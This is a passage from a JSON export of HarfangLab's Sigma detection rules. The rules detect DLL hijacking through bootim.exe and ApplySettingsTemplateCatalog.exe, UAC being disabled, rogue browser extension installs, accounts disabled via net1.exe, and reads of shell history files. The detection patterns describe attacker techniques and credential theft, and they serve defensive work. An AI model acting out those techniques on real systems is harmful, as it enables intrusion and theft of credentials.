],
"name": "t1574_001_dll_hijacking_bootim.yml",
"content": "title: DLL Hijacking via bootim.exe\nid: 0e5eb5ea-f9ef-45a5-9a7e-5e812658c6c1\ndescription: |\n Detects potential Windows DLL Hijacking via bootim.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bootim.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\BootMenuUX.DLL'\n - '\\bootux.dll'\n - '\\Cabinet.dll'\n - '\\dbghelp.dll'\n - '\\DismApi.DLL'\n - '\\FLTLIB.DLL'\n - '\\OLEACC.dll'\n - '\\PROPSYS.dll'\n - '\\ReAgent.dll'\n - '\\ResetEng.dll'\n - '\\tbs.dll'\n - '\\VirtDisk.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n 
Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e5eb5ea-f9ef-45a5-9a7e-5e812658c6c1",
"rule_name": "DLL Hijacking via bootim.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bootim.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e9afbf0-2bb7-4577-abdb-a763825ffb58",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079662Z",
"creation_date": "2026-03-23T11:45:34.079664Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079668Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_applysettingstemplatecatalog.yml",
"content": "title: DLL Hijacking via ApplySettingsTemplateCatalog.exe\nid: 0e9afbf0-2bb7-4577-abdb-a763825ffb58\ndescription: |\n Detects potential Windows DLL Hijacking via ApplySettingsTemplateCatalog.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ApplySettingsTemplateCatalog.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\activeds.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e9afbf0-2bb7-4577-abdb-a763825ffb58",
"rule_name": "DLL Hijacking via ApplySettingsTemplateCatalog.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ApplySettingsTemplateCatalog.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0f267464-6531-4169-a033-e710c3cdd29b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622596Z",
"creation_date": "2026-03-23T11:45:34.622598Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622602Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-lua-settings-enablelua",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_lua.yml",
"content": "title: Limited User Account (LUA) Disabled\nid: 0f267464-6531-4169-a033-e710c3cdd29b\ndescription: |\n Detects Limited User Account (LUA, old name of UAC) being disabled.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process to determine whether this modification is legitimate.\nreferences:\n - https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-lua-settings-enablelua\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2020/12/21\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA'\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: 
'?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_device_enroller:\n # C:\\Windows\\system32\\deviceenroller.exe /o C636116F-52B6-470F-81BC-6D6E0D8D2FE6 /c /b\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_siemens:\n ProcessImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TSplus SAS'\n\n exclusion_qqgame:\n ProcessOriginalFileName: 'qqgame.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Tencent Technology (Shenzhen) Company Limited'\n\n exclusion_wapt:\n ProcessImage: '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains: '?:\\Windows\\CCM\\smsswd.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0f267464-6531-4169-a033-e710c3cdd29b",
"rule_name": "Limited User Account (LUA) Disabled",
"rule_description": "Detects Limited User Account (LUA, old name of UAC) being disabled.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process to determine whether this modification is legitimate.\n",
"rule_creation_date": "2020-12-21",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0f4fc753-a19b-44c4-aa32-f0c68a01a0ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074982Z",
"creation_date": "2026-03-23T11:45:34.074984Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074989Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/",
"https://attack.mitre.org/techniques/T1176/"
],
"name": "t1176_chrome_extension_install.yml",
"content": "title: Suspicious Chrome-based Browser Extension Installed\nid: 0f4fc753-a19b-44c4-aa32-f0c68a01a0ef\ndescription: |\n Detects the installation of an extension in the Chrome or Edge folder by an uncommon process based on the creation of the manifest.json file.\n Every extension must have a manifest.json file in its root directory that lists important information about the structure and behavior of that extension.\n Adversaries may manually install an extension in the browser folder for malicious purposes such as stealing credentials or injecting ads.\n It is recommended to check if the process at the origin of the manifest.json file creation has legitimate reason to do it and if the new extension is legitimate.\nreferences:\n - https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/\n - https://attack.mitre.org/techniques/T1176/\ndate: 2024/10/09\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection_event:\n Kind:\n - 'create'\n - 'rename'\n selection_path:\n - Path:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n - '?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n - TargetPath:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n - '?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n\n exclusion_chrome:\n ProcessOriginalFileName: 'chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n\n exclusion_edge:\n Image:\n - 
'?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\Application\\msedge.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge SxS\\Application\\msedge.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n ProcessSignature : 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_tiworker:\n Image: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_svchost:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService*'\n - '?:\\Windows\\System32\\svchost.exe -k secsvcs'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs -p -s SessionEnv'\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s ProfSvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs'\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_loadstate:\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Corporation'\n ProcessName: 'LoadState.exe'\n\n exclusion_copy:\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Windows'\n ProcessImage:\n - '?:\\Windows\\System32\\xcopy.exe'\n - '?:\\Windows\\System32\\Robocopy.exe'\n - '?:\\Windows\\syswow64\\Robocopy.exe'\n\n exclusion_oobe:\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessCommandLine: '?:\\WINDOWS\\SYSTEM32\\RUNDLL32.EXE shsetup.dll,SHUnattendedSetup specialize'\n\n exclusion_explorer:\n Image: '?:\\Windows\\explorer.exe'\n\n exclusion_dllhost:\n ProcessImage: 
'?:\\Windows\\System32\\dllhost.exe'\n ProcessCommandLine: '?:\\windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n\n exclusion_transwiz:\n ProcessName: 'Transwiz.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'ForensiT Limited'\n\n exclusion_veeam:\n ProcessName: 'VeeamGuestHelper.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Veeam Software Group GmbH'\n\n # File History Service\n exclusion_fhsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc'\n\n exclusion_autobackup:\n ProcessOriginalFileName: 'AutoBackup7Pro.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Fabrice PARISOT'\n\n exclusion_migwiz:\n ProcessOriginalFileName: 'migwiz.exe'\n ProcessDescription: 'Windows Easy Transfer Application'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0f4fc753-a19b-44c4-aa32-f0c68a01a0ef",
"rule_name": "Suspicious Chrome-based Browser Extension Installed",
"rule_description": "Detects the installation of an extension in the Chrome or Edge folder by an uncommon process based on the creation of the manifest.json file.\nEvery extension must have a manifest.json file in its root directory that lists important information about the structure and behavior of that extension.\nAdversaries may manually install an extension in the browser folder for malicious purposes such as stealing credentials or injecting ads.\nIt is recommended to check if the process at the origin of the manifest.json file creation has legitimate reason to do it and if the new extension is legitimate.\n",
"rule_creation_date": "2024-10-09",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1176"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0faba2f2-3820-425b-9718-42eaa1fcb204",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074150Z",
"creation_date": "2026-03-23T11:45:34.074152Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074156Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1531/"
],
"name": "t1564_net_disable_account.yml",
"content": "title: User Account Disabled via net.exe\nid: 0faba2f2-3820-425b-9718-42eaa1fcb204\ndescription: |\n Detects a user account being disabled via net1.exe.\n Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\n Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n It is recommended to analyze the process responsible for the call to net.exe to determine whether this action has legitimate intent.\nreferences:\n - https://attack.mitre.org/techniques/T1531/\ndate: 2021/03/15\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1531\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_net:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_user:\n CommandLine|contains: 'user'\n\n selection_disable:\n CommandLine|contains:\n - '/ACTIVE:NO'\n - '\\ACTIVE:NO'\n\n condition: all of selection_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0faba2f2-3820-425b-9718-42eaa1fcb204",
"rule_name": "User Account Disabled via net.exe",
"rule_description": "Detects a user account being disabled via net1.exe.\nAdversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\nIt is recommended to analyze the process responsible for the call to net.exe to determine whether this action has legitimate intent.\n",
"rule_creation_date": "2021-03-15",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1531"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0fc4c3c8-8e84-4478-998f-09de36df227c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622169Z",
"creation_date": "2026-03-23T11:45:34.622171Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622176Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/003/"
],
"name": "t1552_003_shell_history_read_linux.yml",
"content": "title: Shell History File Read (Linux)\nid: 0fc4c3c8-8e84-4478-998f-09de36df227c\ndescription: |\n Detects an attempt to read any of the common shell history files.\n These files contains the most recent commands executed by the user and can be used by an attacker to look for unsecured credentials.\n It is recommended to analyze the process responsible for reading the files and to determine whether this access is legitimate.\n It can be interesting to download the shell history file to determine if attackers had access to sensitive materials.\nreferences:\n - https://attack.mitre.org/techniques/T1552/003/\ndate: 2022/11/15\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_file:\n - Path|endswith:\n - '.history'\n - '.ash_history'\n - '.bash_history'\n - '.tcsh_history'\n - '.sh_history'\n - '.zsh_history'\n - 'fish_history'\n - TargetPath:\n - '.history'\n - '.ash_history'\n - '.bash_history'\n - '.tcsh_history'\n - '.sh_history'\n - '.zsh_history'\n - 'fish_history'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n ProcessParentImage|contains: '?'\n\n exclusion_shell:\n ProcessImage|endswith:\n - '/ash'\n - '/bash'\n - '/busybox'\n - '/dash'\n - '/fish'\n - '/sh'\n - '/tcsh'\n - '/zsh'\n\n exclusion_desktop_apps_and_daemons:\n ProcessImage|endswith:\n - '/nautilus'\n - '/eog'\n - '/gedit'\n - '/dolphin'\n - '/librewolf'\n - '/firefox'\n - '/chrome'\n - '/code'\n - '/codium'\n - '/sublime_text'\n - '/thunar'\n - '/slack'\n - '/file-roller'\n - '/thunderbird' # /usr/lib/thunderbird/thunderbird\n - '/thunderbird-bin' # /usr/lib/thunderbird/thunderbird-bin\n - '/@joplinapp-desktop'\n - '/gjs-console'\n - '/nemo'\n - '/bacula-fd'\n - '/xdg-desktop-portal-*'\n - 
'/tracker-miner-fs-3'\n\n exclusion_plasma:\n ProcessParentImage|endswith: '/usr/bin/plasmashell'\n\n exclusion_process:\n - ProcessImage:\n - '/opt/eset/*'\n - '/usr/bin/clamscan'\n - '/usr/bin/com.github.phase1geo.minder'\n - '/opt/microfocus/Discovery/.discagnt/udscan'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/usr/lib/libreoffice/program/soffice.bin'\n - '/opt/ds_agent/ds_am'\n - '/usr/lib/virtualbox/VirtualBox'\n - '*/VirtualBoxVM'\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/bin/flameshot'\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n - '/var/ossec/bin/wazuh-syscheckd'\n - '/usr/sbin/smbd'\n - '/usr/bin/rsync'\n - '/usr/bin/proxmox-backup-client'\n - '/opt/signal/signal-desktop'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/opt/sophos-av/engine/_/savscand.?'\n - '/snap/obsidian/*/obsidian'\n - '/opt/elastic/agent/data/elastic-agent-*/components/osqueryd'\n - '/usr/share/teams/teams'\n - '/opt/teams-for-linux/teams-for-linux'\n - '/snap/teams-for-linux/*/teams-for-linux'\n - '/usr/sbin/libvirtd'\n - '/opt/zotero_linux/zotero-bin'\n - '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - '/usr/lib/firefox-esr/firefox-esr'\n - '/usr/lib/firefox/firefox-bin'\n - '/usr/openv/netbackup/bin/bpbkar'\n - '/opt/rocket.chat/rocketchat-desktop'\n - '/usr/bin/inkscape'\n - '/usr/bin/xfce4-panel'\n - '/usr/bin/caja'\n - '/usr/lib/zotero/zotero-bin'\n - '/usr/bin/hstr'\n - '/usr/bin/aide'\n - '/usr/lib/mongodb-compass/mongodb compass'\n - '/usr/bin/cpio'\n - '/opt/omni/lbin/vbda'\n - '/usr/bin/geany'\n - '/usr/bin/okular'\n - '/usr/local/avamar/bin/avtar.bin'\n - '/usr/bin/xfdesktop'\n - '/opt/elastic/agent/data/elastic-agent-*/components/agentbeat'\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/nix/store/*-zen-browser-*/lib/zen-*/zen'\n - ProcessCommandLine:\n - '/opt/cybereason/sensor/bin/cbram'\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - 
'/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n - '/opt/atempo/hn/bin/hnagent'\n - '/usr/bin/python3 /usr/bin/nagstamon'\n\n exclusion_pycharm:\n ProcessImage: '/opt/pycharm-professional/jbr/bin/java'\n ProcessCommandLine|contains: 'com.intellij.idea.main'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_tanium:\n ProcessAncestors|contains:\n - '/opt/tanium/taniumclient/taniumclient'\n - '/opt/tanium/taniumclient/taniumspawnhelper'\n - '/opt/tanium/taniumclient/taniumcx'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0fc4c3c8-8e84-4478-998f-09de36df227c",
"rule_name": "Shell History File Read (Linux)",
"rule_description": "Detects an attempt to read any of the common shell history files.\nThese files contain the most recent commands executed by the user and can be used by an attacker to look for unsecured credentials.\nIt is recommended to analyze the process responsible for reading the files and to determine whether this access is legitimate.\nIt can be interesting to download the shell history file to determine if attackers had access to sensitive materials.\n",
"rule_creation_date": "2022-11-15",
"rule_modified_date": "2026-01-21",
"rule_os": "linux",
"rule_status": null,
